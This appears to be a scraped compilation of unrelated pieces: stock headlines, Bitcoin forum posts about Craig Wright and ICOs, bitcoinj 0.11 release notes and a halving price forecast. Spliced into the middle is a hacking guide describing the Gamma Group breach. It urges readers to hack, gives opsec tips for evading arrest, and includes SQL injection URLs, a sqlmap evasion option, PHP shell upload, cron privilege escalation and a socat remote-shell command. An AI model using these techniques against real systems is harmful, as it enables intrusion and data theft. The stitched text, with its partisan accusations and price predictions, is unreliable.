Overnight News Heading into Thursday August 27th 2020 (News Yet to be Traded 8:00 PM - 4:00 AM EST)
ADXN ($14.40) Addex and the SIB Swiss Institute of Bioinformatics Receive Innosuisse Grant to Repurpose Potent Dopamine Antagonist Using Computational Modelling
ALGT Allegiant Announces Seven New Routes With Fares As Low As $29* Each Way
TLSA ($3.97) Tiziana Life Sciences CEO Updates Shareholders on its Patent Portfolio, Clinical Pipeline, and Strategy in an Exclusive Interview
LBTYA Liberty Global Publishes Offer Prospectus for Sunrise Communications Group Tender Offer
NSP DEADLINE ALERT: Rigrodsky & Long, P.A. Reminds Shareholders Of Insperity Of Upcoming Deadline
CGG ($1.88) Adds Second Azimuth to Northern Viking Graben Multi-Client Survey
UAA ($9.88) Under Armour Sued By UCLA Over $280M Sponsorship Contract Breach
PHG Philips to expand its image-guided therapy devices portfolio through acquisition of Intact Vascular
CCC Clarivate Announces Appointment of Stefano Maestri as Chief Technology Officer
RDY Dr. Reddy's Laboratories announces the launch of Penicillamine Capsules USP, 250 mg in the U.S. Market
End of Day and After Hours News Heading into Thursday August 27th 2020 (News Traded 4:00 PM - 8:00 PM EST)
ABT ($103.19) Abbott's Fast, $5, 15-Minute, Easy-to-Use COVID-19 Antigen Test Receives FDA Emergency Use Authorization; Mobile App Displays Test Results to Help Our Return to Daily Life; Ramping Production to 50 Million Tests a MonthNSP DEADLINE ALERT: Rigrodsky & Long, P.A. Reminds Shareholders Of Insperity, Inc. Of Upcoming Deadline
CLVS ($4.96) FDA Approves FoundationOne® Liquid CDx to Serve as Rubraca® Companion Diagnostic to Identify Eligible Patients with BRCA1/2-Mutant, Metastatic Castration-Resistant Prostate Cancer
DSS ($6,27) Interview to Air on Bloomberg International on the RedChip Money Report
AMC ($5.60) AMC ready to open another 170 theaters for weekend
NTAP NetApp Stock Spikes After Earnings Crush Estimates
RIOT ($3.41) Riot buys more bitcoin miners, sees hashing capacity over 2 EH/s next year
FE FirstEnergy Utility Crews Mobilize to Assist Hurricane Laura Power Restoration Efforts in Texas
MESO Mesoblast Reports Substantial Operational Progress and Financial Results for the Year Ended June 30, 2020
GME GameStop Announces Second Quarter Fiscal 2020 Earnings Release Date
SPLK Splunk Slides as Revenues Miss Amid Business Model Shift
MSFT Microsoft Brings Back Halo Veteran to Get Delayed Game Back on Track
ET ($6.46) Army Corps seeks reversal of Dakota Access pipeline ruling
The blocksize debate, the personal attacks against reputable members of the community, and the Craig Wright revelations are all part of a well orchestrated campaign against Bitcoin. Proof inside?
Uber TL;DR: Craig Wright, anonymously via a report relating to the PGP key from December, attempted to smear and discredit members of the Bitcoin development community, accused Bitcoin Core of hijacking Bitcoin by imposing a blocksize limit, attacked small-block supporters, and heavily promoted big blocks. I hypothesize that the on-going blocksize campaign and Craig are highly connected. Scroll down for a non-Uber TL;DR, or just read the whole thing (yes, its long :)). First, some background. After the December leaks, a paper pertaining to disprove Greg Maxwell's (nullc) allegations of backdating the PGP key has been released by an unknown (at the time) author, titled "Appeal to authority: A failure of trust".
Abstract: In December 2015, a Motherboard article suggested that cryptographic keys ... were created using technology that was not available on the dates they were supposedly made ... in this paper we present evidence that disproves this claim ... In addition, a warning is rung regarding the onset of centralised authority in the control of bitcoin that has been achieved through Blocksize restrictions. These restrictions have led to centralisation of Bitcoin via the dogma of the core development team ...
As for the backdated keys revealed in the December outing, Mr Wright presents a report by First Response, a computer-forensics firm, which states that these keys could have been generated with an older version of the software in question.
While they do not explicitly state that this is the same paper linked above, what are the odds that two different papers were written to support Craig's claims? In all likelihood, Economist refers to the same "Appeal to authority: A failure of trust" paper, mentioning that it was written by a computer forensics firm named First Response. Now, to the interesting part. Within the paper (supposedly written by an independent third party firm), we have the following text:
Generally, an appeal to authority is fallacious when we cite those who have no special expertise. This is of greater concern when we have an individual believed or purporting to be an expert who abuses trust. Even experts have agendas and the only means to ensure that trust is valid is to hold those experts to a greater level of scrutiny.
That very same text (the bold portion) is also mentioned in that same Economist article, but this time attributed to Craig Wright himself:
In an article in the press kit accompanying the publication of his blog post, he takes aim at Gregory Maxwell, one of the leading bitcoin developers, who first claimed that the cryptographic keys in Mr Wright’s leaked documents were backdated. “Even experts have agendas,” he writes, “and the only means to ensure that trust is valid is to hold experts to a greater level of scrutiny.”
This could mean one of two things: either that Craig wrote that report (and presented it as-if it was written by an independent third party forensics company), or that The Economist mis-attributed the text to Craig instead of to the First Response report. However, they already refer to this report earlier in the very same article (the second quote on this post) and attribute it to First Response. It is very unlikely that they later in the same article they would mis-attribute this report to Craig. In addition, what does a forensics company has to do with Bitcoin politics? Why would they even mention that subject? And how would they even have the knowledge to do so? My conclusion is: this report was written by none other than Craig Wright himself, who later used similar phrasing for self-attributed texts in his press kit. He then managed to get First Response to sign-off on that report (or simply just lied about them being involved - would be interesting to try and check that). Now, to the disturbing part. The author of this paper goes out of his way to attack and discredit Gregory Maxwell, over and over, throughout the entire article. He also repeatedly attacks the Bitcoin Core development community, the Bitcoin governance model, and those advocating for smaller blocks. I would say that 70%-80% of that paper is focused on politics, personal attacks against the Bitcoin technical community and heavy promotion for big blocks (later, in the Economist article, he's also advocating for 340GB blocks), in various phrasing that repeat over and over, with only 20%-30% of it actually being related to the technical questions surrounding the PGP key. Here are some selected quotes (there are many more!):
We may either conclude that Gregory Maxwell understood what he was asserting and has intentionally misled the community in stating that the PGP keys referenced had been backdated, or that a Bitcoin core developer did not understand the workings of PGP sufficiently.
In addition, a warning is rung regarding the onset of centralised authority in the control of bitcoin that has been achieved through Blocksize restrictions.
There is an inherent warning in the foregoing discussion with regard to the growing power of individuals who may not fully grasp the full potential of the Blockchain but who nevertheless have a disproportionate level of influence.
In limiting the size of the Block, the issue of control and the use of the protocol is centralised to a limited number of developers.
The bitcoin core protocol was never designed to be a single implementation maintain by a small cabal acting to restrain the heretics. In restricting the Blocksize, the end is the creation of a centralised management body.
Several core developers, including Gregory Maxwell have assumed a mantle of control. This is centralisation. It is not companies that we need to ensure do not violate our trust, but individuals.
Gregory Maxwell has been an avid supporter in limiting Blocksize. The arguments as to the technical validity of this change are political and act against the core principles of Bitcoin. The retention of limits on Block size consolidates power into the hands of a few individuals.
The position that has been assumed by those seeking centralisation of Bitcoin for many years is to create an artificial scarcity within Bitcoin associated with the limits on the Blocksize.
Those with power need to be held to a higher standard.
We can clearly assert that the evidence Maxwell has presented to justify his assertions to Motherboard that the PGP keys is false. His motives in this remain a mystery.
This report also uses the strawman logical fallacy, attributing Greg with claims that he never made while avoiding quoting his exact words (instead, optin to quote the press's paraphrase of Greg's words). While Greg said that the algorithms weren't in wide use at the alleged time of the key creation, they repeatedly mis-quote him as claiming that it was impossible to generate such a key at the time. Based on this strawman, they build mountains and hillsides, claiming that they can prove their claim in absolute logical terms ("This is a binary outcome and there cannot be any other result. Either creating the keys was possible, or the evidence reported by Motherboard was unfounded"). That was what Greg actually wrote:
Incidentally; there is now more evidence that it's faked. The PGP key being used was clearly backdated: its metadata contains cipher-suites which were not widely used until later software.
This is what the report claims:
In the logical analysis of evidence, we cannot have contradictions. Where such a contradiction exists, we need to check our premises. In this process that we are exploring together, either we can recreate a similar key along the lines of the one Maxwell has stated could not have existed (WAS NEVER SAID! N.I.) and must have been backdated, or we cannot. If we can create a key using the GnuPG software from 2007 and add the attributes of the disputed keys to a newly created key pair, then Maxwell is wrong. If we cannot complete this process, then he was correct and the keys could have been backdated. This is a binary outcome and there cannot be any other result. Either creating the keys was possible, or the evidence reported by Motherboard was unfounded.
We see here the default hash list of “2.8.3” as Maxwell asserts is the only available choice. (WAS NEVER SAID! N.I.)
The importance of this statement is that Maxwell has firmly asserted that the algorithms, “8,2,9,10,11” have only been added from a later period in 2009 ... We have engaged in this exercise in order to demonstrate that the former statement made by Maxwell is incorrect.
This exercise proves that those algorithms that had been stated to not exist at the time within GnuPG 1.4.7 had indeed been implemented. Maxwell’s assertion is false.
That report is, of course, total and utter nonsense. The algorithms did exists in PGP (no one claimed otherwise), but there was no ciphersuite that combined them together. It was indeed possible to manually select that ciphersuite, the command to do so would look like that:
There's no way that anyone would choose these exact algorithms under the exact same order before it was added as the default to PGP. Its important to note that the ciphersuite was chosen by the open source community after much discussions and knowledge acquired over time regarding the algorithms, which showed this combination to be the most secure. Foreseeing that this suite is going to be the state of the art, a few years before the PGP community figured it out, is extremely unlikely. TL;DR
After Greg exposed Craig's bluff regarding the PGP key from December, Craig writes a report that allegedly proves his key wasn't backdated. It is published on late December '15 - Early January '16 (anyone has an exact date?).
That entire article is based on a strawman, and doesn't really prove anything. It shows that it could be technically possible to create such a key at the alleged time, but completely disregards the fact that the likelihood of that happening is practically zero.
He released this report anonymously, not attributing it to anyone.
He uses this opportunity to discredit Greg, repeatedly attacking his personal integrity and technical competence. He also attacks Bitcoin Core with claims of an hostile takeover by a "small cabal" that wants to control Bitcoin by restricting the blocksize. He smears the "small blocks camp", while heavily advocating for larger blocks. He does that using personal attacks and severe words pointed at highly respected members of the community. About 70%-80% of the report isn't related to the PGP key at all, but rather to politics and attacks.
In his press kit for the revelation, he attaches this report, this time attributed to a forensics company called First Response. In addition to the report, he attaches more attacks against Greg, which he does attribute to himself. The phrasing of his self-attributed attacks strikes an extraordinary resemblance to the attacks in the report.
Having read this report, I now believe that what we're seeing is another stage of a well orchestrated attack on Bitcoin, whose goal is to discredit reputable members of the Bitcoin community, create factions within the community and to sow distrust among community members. This attack hasn't started now. The opening shot was the block size campaign, which was designed to spread toxicity and dissent, promote personal attacks against thought leaders and technical experts, and split the community into two opposing camps. The goal is to dissemble the human and social fabric of Bitcoin, to subvert our trust in the cypher-punk "leaders" of the bitcoin space and to create chaos and confusion, in order to prepare the ground for the second stage - an hostile takeover of the Bitcoin protocol development via a person claiming to be Satoshi Nakamoto, which will support this new development team and lead people after him. I don't usually tend to be overly conspirative, but this report is highly disturbing. It has the very clear agenda of attacking Bitcoin Core and the consensus mechanism, while heavily promoting big blocks. We have appealing evidence that it was written by Craig, which also continues his attack as part of his press release. All of that leads me to believe that the blocksize campaign, the non-stop attacks against the Bitcoin development community and thought leaders, and the Craig revelation as "being Satoshi" are all tightly connected as part of an orchestrated attack. And all of that follows repeating evidence of ongoing sock-puppets and rating manipulation within our online communities, Sybilattackson the P2P network to create a false image of Classic support, and DDoS attacks. (interesting to note that voting manipulation was put into use with greater vigor during the Craig revelations, according to theymos - "there's substantial vote manipulation in /Bitcoin right now"). I truly believe that this is the real thing. We're witnessing an orchestrated full-scale attack on Bitcoin, by a well-organized entity with significant financial means. Buckle up!
There is a big cognitive dissonance within the crypto community. The dream of decentralization and censorship resistance is dominated by big centralized exchanges centralized empires like Binance and Coinbase. Speculation still drives the market and fuels the continued growth of centralized exchanges. One of the leading factors fueling the revenue stream of exchanges is new coins, namely ICOs and in future STOs. ICOs became nothing more than a way of Flipping Tokens. Most ICOs used and continue to used Proof of Greater Fool to push forward their blockchain. People invest in something that they know is probably worthless and extremely overpriced, hoping that they can sell that worthless overpriced digital token to a "Greater Fool". In the end, all ICO investors are fools because even if Fool #1 manages to Flip the token at 3x the price he bought it at, he is still the fool compared to the ''ICO that now holds millions** collected by all the #1 fools. Essentially ICOs that list on exchanges right away that have nothing to offer and no product are basically Ponzi schemes, with ICO team at the top, ICO Buyers second Layer and people on the exchange at the bottom of the pyramid. The IEO (Initial Exchange Offering) is a natural evolution of this Ponzi scheme: Now with ICO and Exchanges working together to pump up the price, being able to freely manipulate the price of the token and print free money. As Cryptocurrencies are a totally unregulated market they are pretty much free to do whatever they want. Cryptocurrency exchanges basically became empires fueled by greed, trading fees, listing fees, and so much more. These empires have no interest in changing the system, similar to how banks do not want to give away power. It is expected of anyone in power to be very corrupt in a totally uncontrolled market.
BUIDL VS Initial Exchange Offerings
In 2019, for the first time in 3 years, projects that focused on tech, product, and business development came out of the darkness. Most people pretended to work to look good to raise money, however, some actually worked to solve problems. 2019 was also the year that we started to see Initial Exchange Offerings. ICOs conducted on exchanges compared to publicly. The original purpose of ICOs was to take away the monopoly of fundraising away from stock exchanges and brokerage firms. An IEO is well explained in that scene of Wolf of Wall Street, when they opened an IPO for Steve Madden shoes. Remember when a centralized entity is responsible for issuing a new stock? It probably has a vast interest in pumping that price, but is it legal in the traditional financial space? ICOs that are actually working hard to build their product also understand that in order for their projects to become successful they need to become decentralized. They need to get their tokens in as many hands as possible. Of course, the person that is attached to that hand should also bring value to the project. The best example of the power of useful decentralization is Bitcoin. Bitcoin has a pretty old tech, had a few bugs in their source code, is super slow, but yet it has by far the best community and strongest social consensus. Hashrate doesn't mean much, after all, Bitcoin Cash had a bigger hash rate for a brief while, but it was the social consensus of the mining community that decided not to implement the new changes introduced by Rodger and Bitmain. Now BCH is less than 96% of the market Cap it used to be. The value of cryptocurrencies is defined by nothing more than censorship resistance, game theory, and token holders. In the long term, these three factors will be decisive determining which coin will have the biggest market cap. Bitcoin has by far the most censorship resistance, probably one of the best game theories and by far the best community. The value of a coin is pretty much all about: how hard it is to change the information saved on the block * (sum of all useful skills and influence amongst all token holders) that can be leveraged by game theory within the ecosystem.
Best case vs Worst Case outcome for an ICO
An ICO that is used for its actual purpose and not as a vehicle to facilitate scamming, can be seen as the big bang of any new blockchain ecosystem. Successful ICOs understand that they need to act like economies, not companies. Usually, economies filled with smart people that can utilize their skills to push their ecosystem that is also run by the good government (good game theory) do very well, compared to economies that have a very small set of inhabitants that can bring economic value for influence and skill sets. The optimal scenario for an ICO would be if the tokens were magically distributed among the best developers, business integrators, influencers, politicians and basically anybody that would be willing and capable of bringing value to the new blockchain ecosystem. Bitcoin’s mechanism to achieve this magical community was via mining and its 4-year reward halving cycle. It takes a great deal of passion and technical skills to start mining. Also, the low token price during the first few years motivated the best developers, who are also deeply interested in the technology, to jump onboard and help on its development efforts. This also allowed them to acquire a lot of tokens in the process. The 4 year Bitcoin Pump and Dumps enable very smart individuals to join the bitcoin ecosystem every 4 years and accumulate at low prices. Regulators love crypto once they’ve also bought a bag. Therefore the best outcome is the magical distribution of tokens to all the best developers, business integrators, influencers, politicians and basically anybody that would be willing and able to help that new blockchain ecosystem. The worst case would be an ICO whose tokens holders are mostly speculators, also known as an initial Exchange offering.
Mike Hearn posted this on the Bitcoin Developer Mailing List:
I'm pleased to announce the release of bitcoinj 0.11, a library for writing Bitcoin applications that run on the JVM. BitcoinJ is widely used across the Bitcoin community; some users include Bitcoin Wallet for Android, MultiBit, Hive, blockchain.info, the biteasy.com block explorer (written in Lisp!), Circle, Neo/Bee (Cypriot payment network), bitpos.me, Bitcoin Touch, BlueMatt's relay network and DNS crawler, academic advanced contracts research and more. The release-0.11 git tag is signed by Andreas Schildbach's GPG key. The commit hash is 410d4547a7dd. This paragraph is signed by the same Bitcoin key as with previous releases (check their release announcements to establish continuity). Additionally, this email is signed using DKIM and for the first time, a key that was ID verified by the Swiss government. Key: 16vSNFP5Acsa6RBbjEA7QYCCRDRGXRFH4m Signature for last paragraph: H3DvWBqFHPxKW/cdYUdZ6OHjbq6ZtC5PHK4ebpeiE+FqTHyRLJ58BItbC0R2vo77h+DthpQigdEZ0V8ivSM7VIg=
Thanks to Mike Belshe, the wallet can now send to P2SH addresses.
Thanks to Matt Corallo, the network layer was rewritten from scratch. It no longer depends on Netty, and it now supports both blocking and non-blocking sockets. In practice that means Java's built in support for transparent SSL and SOCKS becomes available again, which in turn means connecting via Tor is now possible. The new framework is lightweight, easy to understand and has been running a DNS seed crawler for some months now.
Thanks to Kevin Greene, we've added some support for the BIP70 payment protocol. Wallet authors can now consume payment requests, check their signatures and submit payments with the new easy to use PaymentSession class. The wallet-tool command line UI has support and an article explains how to use it.
Thanks to Miron Cuperman, the wallet can now watch arbitrary addresses and scripts. The wallet could previously watch an address as long as the public key was known. Now it's possible to watch for addresses even when the public key is not known.
Also thanks to Miron, Bloom filtering was also improved. The system now tracks false positive rates and cleans the filter when FP rates get too high. Unfortunately, some privacy bugs in Bloom filtering remain, which could (amongst other things) allow a malicious remote peer to test whether you own a particular key.
Thanks to Alex Taylor (bitpos.me), a new PostgreSQL based pruning block store was added. This block store is fast, and indexes the UTXO set, allowing for fast lookup of the balance of any given address.
A Java 8 based wallet template app is now included. The template is designed for people writing contract based applications. It provides a simple app that can be copy/pasted, which connects to the P2P network, manages a wallet, and provides a GUI that shows progress, balance, address+qrcode for receiving money and has a button that is used to empty the wallet out. It's designed to have an attractive and modern look, with tasteful animations and artwork.
Micropayment channels got many big improvements to the API and implementation. The release in 0.10 can be seen as a beta, in this release the micropayments code has been taken for a test drive for a couple of real apps and many rough edges polished as a result.
The default USER_THREAD executor can now be replaced, allowing a 1-line switch of all callbacks onto a thread of your choice instead of needing to override each callback, each time. This should simplify and clean up the GUI code of wallet apps significantly.
The WalletTool command line app has a more convenient user interface now.
A new DNS seed has been added. The seed is run by Christian Decker, from ETH Zurich.
bitcoinj 0.11 will shortly be available via Maven Central. Please use the dependency verifier plugin and/or check the PGP signatures on the uploads, if you use this!
We finished adding nullity annotations to the API. You should now be able to assume that any method not annotated with @Nullable won't ever return null values.
The WalletAppKit got a bunch of new features and convenience APIs.
The wallet will now create inputs with dummy signatures if the private key for an output is missing, rather than throwing an exception. You can then edit the input later to substitute in a real signature. This is useful when the signing is being done elsewhere, outside of the library.
In full verification mode, execution of scripts (i.e. checking signatures) can now be switched off. This is useful if you trust the source of the chain and just want to calculate the UTXO set.
The wallet risk analysis code is now pluggable, better documented and checks for finality in a more sensible way.
Various memory usage and flow control optimisations were made to allow much larger wallets to sync on Android.
The transaction broadcast algorithm was changed to be more robust.
Double spend handling in the wallet was improved.
Generated signatures now use canonical S values. This will aid a future hard-forking rule change which bans malleable signatures.
Some fixes were made for enable usage with the Orchid Tor library. Further support for Tor is planned for future releases.
Notable bug fixes
Some hard-forking full verification bugs were fixed.
Thanks to Miron, PeerGroup now performs exponential backoff for peer connections, for instance if we cannot connect to them or if they disconnect us. This resolves an annoying bug in which if the library was configured with a single peer that was down, it would spin in a tight loop consuming battery.
Some functionality of the Wallet class was moved into separate classes under the wallet package.
The micropayments API and protocol changed. New clients/servers are not compatible with apps running against previous releases.
The Wallet sendCoins/completeTx methods no longer return booleans or null to indicate failure, they now throw InsufficientMoneyException?or a subclass if the transaction cannot be completed. The exception object typically contains information on how much money is missing.
Some mis-named methods in the HD key derivation API were renamed.
The WalletEventListener interface has an extra method for watching scripts now.
Peer discovery classes moved under the net.discovery package
Any APIs that relied on Netty are now different.
An article on the networking API
Info on testing your apps, and how to use regtest mode to make a private Bitcoin network that allows you to mine blocks instantly.
A reference table showing which API's implement which Bitcoin Improvement Proposals (BIPs).
--1-- Introduction I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple it is, and to hopefully inform and inspire you to go out and hack shit. If you have no experience with programming or hacking, some of the text below might look like a foreign language. Check the resources section at the end to help you get started. And trust me, once you've learned the basics you'll realize this really is easier than filing a FOIA request. -- 2 -- Staying Safe This is illegal, so you'll need to take same basic precautions:
(Optional) While just having everything go over Tor thanks to Whonix is probably sufficient, it's better to not use an internet connection connected to your name or address. A cantenna, aircrack, and reaver can come in handy here.
As long as you follow common sense like never do anything hacking related outside of Whonix, never do any of your normal computer usage inside Whonix, never mention any information about your real life when talking with other hackers, and never brag about your illegal hacking exploits to friends in real life, then you can pretty much do whatever you want with no fear of being v&. NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable for some things like web browsing, when it comes to using hacking tools like nmap, sqlmap, and nikto that are making thousands of requests, they will run very slowly over Tor. Not to mention that you'll want a public IP address to receive connect back shells. I recommend using servers you've hacked or a VPS paid with bitcoin to hack from. That way only the low bandwidth text interface between you and the server is over Tor. All the commands you're running will have a nice fast connection to your target. -- 3 -- Mapping out the target Basically I just repeatedly use fierce.pl, whois lookups on IP addresses and domain names, and reverse whois lookups to find all IP address space and domain names associated with an organization. For an example let's take Blackwater. We start out knowing their homepage is at academi.com. Running fierce.pl -dns academi.com we find the subdomains:
Doing a whois lookup on academi.com reveals it's also registered to the same address, so we'll use that as a string to search with for the reverse whois lookups. As far as I know all the actual reverse whois lookup services cost money, so I just cheat with google:
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more whois lookups and repeat the process until you've found everything. Also just google the organization and browse around its websites. For example on academi.com we find links to a careers portal, an online store, and an employee resources page, so now we have some more:
If you repeat the whois lookups and such you'll find academiproshop.com seems to not be hosted or maintained by Blackwater, so scratch that off the list of interesting IPs/domains. In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com was simply a whois lookup of finfisher.com which found it registered to the name "FinFisher GmbH". Googling for:
"FinFisher GmbH" inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com ...so now you've got some idea how I map out a target. This is actually one of the most important parts, as the larger the attack surface that you are able to map out, the easier it will be to find a hole somewhere in it. -- 4 -- Scanning & Exploiting Scan all the IP ranges you found with nmap to find all services running. Aside from a standard port scan, scanning for SNMP is underrated. Now for each service you find running:
Is it exposing something it shouldn't? Sometimes companies will have services running that require no authentication and just assume it's safe because the url or IP to access it isn't public. Maybe fierce found a git subdomain and you can go to git.companyname.come/gitweb/ and browse their source code.
Is it horribly misconfigured? Maybe they have an ftp server that allows anonymous read or write access to an important directory. Maybe they have a database server with a blank admin password (lol stratfor). Maybe their embedded devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's default password.
Is it running an old version of software vulnerable to a public exploit?
Webservers deserve their own category. For any webservers, including ones nmap will often find running on nonstandard ports, I usually:
Browse them. Especially on subdomains that fierce finds which aren't intended for public viewing like test.company.com or dev.company.com you'll often find interesting stuff just by looking at them.
Run nikto. This will check for things like webserve.svn/, webservebackup/, webservephpinfo.php, and a few thousand other common mistakes and misconfigurations.
Identify what software is being used on the website. WhatWeb is useful
First try that against all services to see if any have a misconfiguration, publicly known vulnerability, or other easy way in. If not, it's time to move on to finding a new vulnerability: 5) Custom coded web apps are more fertile ground for bugs than large widely used projects, so try those first. I use ZAP, and some combination of its automated tests along with manually poking around with the help of its intercepting proxy. 6) For the non-custom software they're running, get a copy to look at. If it's free software you can just download it. If it's proprietary you can usually pirate it. If it's proprietary and obscure enough that you can't pirate it you can buy it (lame) or find other sites running the same software using google, find one that's easier to hack, and get a copy from them. For finsupport.finfisher.com the process was:
Start nikto running in the background.
Visit the website. See nothing but a login page. Quickly check for sqli in the login form.
See if WhatWeb knows anything about what software the site is running.
WhatWeb doesn't recognize it, so the next question I want answered is if this is a custom website by Gamma, or if there are other websites using the same software.
I view the page source to find a URL I can search on (index.php isn't exactly unique to this software). I pick Scripts/scripts.js.php, and google: allinurl:"Scripts/scripts.js.php"
I find there's a handful of other sites using the same software, all coded by the same small webdesign firm. It looks like each site is custom coded but they share a lot of code. So I hack a couple of them to get a collection of code written by the webdesign firm.
At this point I can see the news stories that journalists will write to drum up views: "In a sophisticated, multi-step attack, hackers first compromised a web design firm in order to acquire confidential data that would aid them in attacking Gamma Group..." But it's really quite easy, done almost on autopilot once you get the hang of it. It took all of a couple minutes to:
google allinurl:"Scripts/scripts.js.php" and find the other sites
Notice they're all sql injectable in the first url parameter I try.
Realize they're running Apache ModSecurity so I need to use sqlmap with the option --tamper='tampemodsecurityversioned.py'
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it's database admin! For MySQL this means you can read and write files. It turns out the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. But I can use a short script that uses sqlmap --file-read to get the php source for a URL, and a normal web request to get the HTML, and then finds files included or required in the php source, and finds php files linked in the HTML, to recursively download the source to the whole site. Looking through the source, I see customers can attach a file to their support tickets, and there's no check on the file extension. So I pick a username and password out of the customer database, create a support request with a php shell attached, and I'm in! -- 5 -- (fail at) Escalating < got r00t? >
Root over 50% of linux servers you encounter in the wild with two easy scripts, Linux_Exploit_Suggester, and unix-privesc-check. finsupport was running the latest version of Debian with no local root exploits, but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer so I add to /etc/cron.hourly/webalizer:
wait an hour, and ....nothing. Turns out that while the cron process is running it doesn't seem to be actually running cron jobs. Looking in the webalizer directory shows it didn't update stats the previous month. Apparently after updating the timezone cron will sometimes run at the wrong time or sometimes not run at all and you need to restart cron after changing the timezone. ls -l /etc/localtime shows the timezone got updated June 6, the same time webalizer stopped recording stats, so that's probably the issue. At any rate, the only thing this server does is host the website, so I already have access to everything interesting on it. Root wouldn't get much of anything new, so I move on to the rest of the network. -- 6 -- Pivoting The next step is to look around the local network of the box you hacked. This is pretty much the same as the first Scanning & Exploiting step, except that from behind the firewall many more interesting services will be exposed. A tarball containing a statically linked copy of nmap and all its scripts that you can upload and run on any box is very useful for this. The various nfs-* and especially smb-* scripts nmap has will be extremely useful. The only interesting thing I could get on finsupport's local network was another webserver serving up a folder called 'qateam' containing their mobile malware. -- 7 -- Have Fun Once you're in their networks, the real fun starts. Just use your imagination. While I titled this a guide for wannabe whistleblowers, there's no reason to limit yourself to leaking documents. My original plan was to:
Hack Gamma and obtain a copy of the FinSpy server software
Find vulnerabilities in FinSpy server.
Scan the internet for, and hack, all FinSpy C&C servers.
Identify the groups running them.
Use the C&C server to upload and run a program on all targets telling them who was spying on them.
Use the C&C server to uninstall FinFisher on all targets.
Join the former C&C servers into a botnet to DDoS Gamma Group.
It was only after failing to fully hack Gamma and ending up with some interesting documents but no copy of the FinSpy server software that I had to make due with the far less lulzy backup plan of leaking their stuff while mocking them on twitter. Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password already so I can move on to step 2! -- 8 -- Other Methods The general method I outlined above of scan, find vulnerabilities, and exploit is just one way to hack, probably better suited to those with a background in programming. There's no one right way, and any method that works is as good as any other. The other main ways that I'll state without going into detail are: 1) Exploits in web browers, java, flash, or microsoft office, combined with emailing employees with a convincing message to get them to open the link or attachment, or hacking a web site frequented by the employees and adding the browsejava/flash exploit to that. This is the method used by most of the government hacking groups, but you don't need to be a government with millions to spend on 0day research or subscriptions to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit for a couple thousand, and rent access to one for much less. There's also metasploit browser autopwn, but you'll probably have better luck with no exploits and a fake flash updater prompt. 2) Taking advantage of the fact that people are nice, trusting, and helpful 95% of the time. The infosec industry invented a term to make this sound like some sort of science: "Social Engineering". This is probably the way to go if you don't know too much about computers, and it really is all it takes to be a successful hacker. -- 9 -- Resources Links:
http://www.dest-unreach.org/socat/ Get usable reverse shells with a statically linked copy of socat to drop on your target and: target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM host$ socat file:tty,raw,echo=0 tcp-connect:localhost:PORTNUM It's also useful for setting up weird pivots and all kinds of other stuff.
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
Aside from the hacking specific stuff almost anything useful to a system administrator for setting up and administering networks will also be useful for exploring them. This includes familiarity with the windows command prompt and unix shell, basic scripting skills, knowledge of ldap, kerberos, active directory, networking, etc. -- 10 -- Outro You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a tool. It's not selling hacking tools that makes Gamma evil. It's who their customers are targeting and with what purpose that makes them evil. That's not to say that tools are inherently neutral. Hacking is an offensive tool. In the same way that guerrilla warfare makes it harder to occupy a country, whenever it's cheaper to attack than to defend it's harder to maintain illegitimate authority and inequality. So I wrote this to try to make hacking easier and more accessible. And I wanted to show that the Gamma Group hack really was nothing fancy, just standard sqli, and that you do have the ability to go out and take similar action. Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned hackers, dissidents, and criminals!
Hey everyone, Throwaway account btw. I’ve been deep in thought about the upcoming Bitcoin halving and wanted to share my views as well as seek alternate perspectives. I think BTC is now big enough to really have exposure to global events, and predict we are about to be in a wild ride. Even though my analysis is definitely bearish in the short term, really believe BTC is about to “grow up” after the turmoil of the next few weeks is over. The tldr; to this is that I’m betting there will be a massively sharp downward drop in the price of BTC (ie sub USD$200) in the coming weeks with a longer term recovery highly likely, however the time it takes for this could be vary from a fortnight to many months, and be driven by a new and higher transaction fee norm. I’ve been selling down my stake in the recent week given the high prices, as I am very confident a big opportunity is emerging to buy at the $150 level in the next few weeks and I’m building a war chest for it. The detail There’s of course no exact reason why the price of bitcoin has jumped so much in recent weeks, however I’ll assert it is a combination of the following;
Brexit -> and a rush to take money out of the European economy into safer places. Gold has risen, and so is BTC.
China -> the continued movement of funds out of the country
The Halving -> people see reduced supply as a reason to buy in
Speculators/observers -> they don’t want to miss out, so are jumping in and fueling the volumes/price upwards
